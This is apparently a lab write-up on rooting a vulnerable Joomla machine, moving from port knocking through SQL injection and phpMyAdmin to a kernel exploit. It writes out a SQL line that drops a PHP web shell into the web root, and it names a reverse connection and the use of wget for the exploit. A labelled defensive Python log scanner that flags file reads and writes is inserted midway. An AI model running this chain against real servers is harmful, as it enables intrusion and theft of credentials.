As usual I started with netdiscover:
Next step was to scan ports:
In reality I spent a bit of time here, as port 80 did not reveal anything and port 666 was filtered. I used a tool called knock-knock (https://github.com/pan0pt1c0n/knock-knock); after running it I saw port 666 as open. I examined the source code of the page, which showed it was Joomla. I enumerated the target further using the Metasploit module for Joomla plugins, since plugins are quite often vulnerable.
3. Exploitation
I was right: sectionid was vulnerable to SQL injection. As a next step I entered a quote to verify whether this was true:
As a next step I reviewed the Joomla documentation to find out which table stores the user hashes. I did the SQL injection exploitation by hand instead of using sqlmap: I found a field suitable for data exfiltration, enumerated the tables, etc. I used this request to extract information about users:
This gave me hashes:
I cracked the hashes using Joomla_cracker.pl from https://gist.github.com/cobra-tn/2304218. The cracked hashes did not give me any new foothold, so I decided to use another SQLi option: retrieving files. By default the Joomla configuration file is located in the web root, and I assumed /var/www was the default path. After I retrieved the file I tried the "root" username and password to log in to phpMyAdmin.
I was able to log in. Then I spent some time creating a limited shell, using this video as an example: https://worldhack3r.wordpress.com/2013/05/06/upload-shell-in-phpmyadmin/. To cut a long story short: I created a database and a table in MySQL, then used the MySQL INTO OUTFILE clause to write a PHP shell into the web root:
SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/cmd.php"
Then I used this shell to create a connection back to my machine using Python.
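As an added, defender-side example that is not part of this writeup: a small scanner over MySQL general-log lines that flags the two kinds of server-side file operation used above (a file read through SQL injection, and an INTO OUTFILE write landing in the web root). The log lines are constructed, and the read is assumed to use MySQL's LOAD_FILE(), which the post itself does not name.

```python
import re

# Constructed sample of a MySQL general query log (not taken from the post).
# Thread 12 dumps hashes and then reads a file; thread 15 writes into the web root.
SAMPLE_GENERAL_LOG = """\
2020-01-01T10:00:01.000000Z\t   12 Query\tSELECT id, username, password FROM jos_users
2020-01-01T10:00:02.000000Z\t   12 Query\tSELECT LOAD_FILE('/var/www/configuration.php')
2020-01-01T10:00:03.000000Z\t   15 Query\tSELECT '<payload>' INTO OUTFILE '/var/www/cmd.php'
2020-01-01T10:00:04.000000Z\t   15 Query\tSELECT title FROM jos_content WHERE sectionid = 1
"""

# General-log format (MySQL 5.7+): <time>  <thread_id> <command>  <argument>
LOG_LINE = re.compile(r"^\S+\s+(?P<thread>\d+)\s+Query\s+(?P<sql>.*)$")
# Server-side file write: ... INTO OUTFILE '<path>' / INTO DUMPFILE '<path>'
FILE_WRITE = re.compile(r"INTO\s+(OUTFILE|DUMPFILE)\s+(['\"])(?P<path>[^'\"]+)\2", re.I)
# Server-side file read (assumed technique): LOAD_FILE('<path>')
FILE_READ = re.compile(r"LOAD_FILE\s*\(\s*(['\"])(?P<path>[^'\"]+)\1\s*\)", re.I)


def file_operations(sql):
    """Return (kind, path) pairs for every file read/write found in one SQL statement."""
    ops = [("write", m.group("path")) for m in FILE_WRITE.finditer(sql)]
    ops += [("read", m.group("path")) for m in FILE_READ.finditer(sql)]
    return ops


def scan_general_log(text, web_roots=("/var/www",)):
    """Flag every logged query that touches the filesystem.

    A write under a web root is rated 'critical' (it is how the shell above was
    dropped); any other file read or write is rated 'high'.
    """
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        for kind, path in file_operations(m.group("sql")):
            in_web_root = any(path.startswith(root.rstrip("/") + "/") for root in web_roots)
            severity = "critical" if kind == "write" and in_web_root else "high"
            findings.append({"thread": int(m.group("thread")), "kind": kind,
                             "path": path, "severity": severity})
    return findings


if __name__ == "__main__":
    for finding in scan_general_log(SAMPLE_GENERAL_LOG):
        print(finding)
```

Turning the general log on is expensive, so in practice the same rules are better applied to audit-plugin output; the cheaper control is to leave the FILE privilege off web-facing accounts and set secure_file_priv away from the web root.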
4. Privilege escalation
After a quick enumeration I tried several kernel exploits. The machine was rooted using the "RDS socket" exploit (https://www.exploit-db.com/exploits/15285/). I uploaded the exploit code to /tmp using wget, compiled it with the default gcc and got root.
In general the machine was not difficult; there were only a few tricky moments to overcome:
1. port knocking - recognising that it is in use and finding a way past it
2. using SQL injection not only to dump hashes but also to read files from the filesystem
3. getting a shell through phpMyAdmin